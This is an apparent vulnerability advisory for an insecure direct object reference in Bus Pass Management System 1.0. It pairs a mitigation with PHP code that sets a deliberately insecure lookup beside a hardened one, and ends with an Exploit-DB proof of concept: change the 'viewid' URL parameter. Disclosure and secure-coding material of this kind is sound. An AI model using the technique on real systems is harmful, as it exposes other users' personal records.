Vendor: Bus Pass Management System
Author: sudoninja
CVSS: 8.8 (HIGH)
Vulnerability type: Insecure direct object references (IDOR)
CWE: 639
Product Name: Bus Pass Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:bus_pass_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 - XAMPP Server
2021

Bus Pass Management System 1.0 – ‘viewid’ Insecure direct object references (IDOR)

The viewid parameter is vulnerable to Insecure direct object references (IDOR). An attacker can exploit this vulnerability by changing the viewid parameter in the URL to access sensitive information of other users.

Mitigation:

The application should validate the user input and restrict access to sensitive information based on user privileges.
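The following PHP is an added illustration of that mitigation and is not code from the Bus Pass Management System itself. It shows the vulnerable shape of a `view-pass-detail.php`-style handler (the record is selected purely by the client-supplied `viewid`) beside a hardened version in which the lookup is tied to the authenticated session: an administrator may view any pass, an ordinary user only passes they own, and a non-existent or foreign id is answered with a generic 404. The `$pdo` connection, the `tblpass` table with `ID` and `UserID` columns, and the `uid` / `is_admin` session keys are assumptions, not the project's real schema.

```php
<?php
// Added example, not the project's own code. Assumed: a PDO handle in $pdo,
// a table `tblpass` with columns `ID` and `UserID`, and the logged-in user's
// id and role stored in $_SESSION['uid'] / $_SESSION['is_admin'].
// All table, column and session names are hypothetical placeholders.

session_start();

// --- Vulnerable pattern: the row is fetched by the client-supplied id only.
// Whatever id the caller names is returned; nothing ties it to the session.
function viewPassInsecure(PDO $pdo, int $viewid): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM tblpass WHERE ID = :id');
    $stmt->execute([':id' => $viewid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened pattern: the lookup is bound to the authenticated principal.
function viewPassAuthorized(PDO $pdo, int $viewid): ?array
{
    // Unauthenticated requests never reach the database.
    if (empty($_SESSION['uid'])) {
        http_response_code(401);
        return null;
    }
    $uid     = (int) $_SESSION['uid'];
    $isAdmin = !empty($_SESSION['is_admin']);

    if ($isAdmin) {
        // Administrators are permitted to view any pass.
        $stmt = $pdo->prepare('SELECT * FROM tblpass WHERE ID = :id');
        $stmt->execute([':id' => $viewid]);
    } else {
        // Ownership is enforced inside the query itself, so a foreign id
        // simply yields no row instead of another user's pass.
        $stmt = $pdo->prepare(
            'SELECT * FROM tblpass WHERE ID = :id AND UserID = :uid'
        );
        $stmt->execute([':id' => $viewid, ':uid' => $uid]);
    }

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        // Answer 404 rather than 403 so the response does not confirm
        // that the requested id exists.
        http_response_code(404);
        return null;
    }
    return $row;
}

// --- Request handling: validate the id before touching the database.
$viewid = filter_input(
    INPUT_GET,
    'viewid',
    FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]
);
if ($viewid === false || $viewid === null) {
    http_response_code(400);
    exit('invalid viewid');
}

// Placeholder DSN and credentials; replace with the real connection settings.
$pdo  = new PDO('mysql:host=localhost;dbname=bpmsdb', 'dbuser', 'dbpass');
$pass = viewPassAuthorized($pdo, $viewid);
if ($pass === null) {
    exit('not found');
}
// ... render $pass ...
```

The point of the hardened variant is that authorization is decided server-side from session state, never from anything the client can edit in the URL. Putting the ownership condition into the SQL (`AND UserID = :uid`) rather than checking it after the fetch avoids the common mistake of loading the record and then forgetting the comparison on one code path.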

Exploit-DB raw data:

# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
# Date: 2021-09-05
# Exploit Author: sudoninja
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server

# Vulnerable page :

http://localhost/buspassms/admin/view-pass-detail.php?viewid=4

# Vulnerable parameter :

The viewid parameter is vulnerable to Insecure direct object references (IDOR)

# Proof Of Concept :

# 1 . Download And install [ bus-pass-management-system ]
# 2 . Go to /admin/index.php and Enter Username & Password 
# 3 . Navigate to search >> search pass
# 4 . Click on view and change the viewid in the URL

Use :
http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]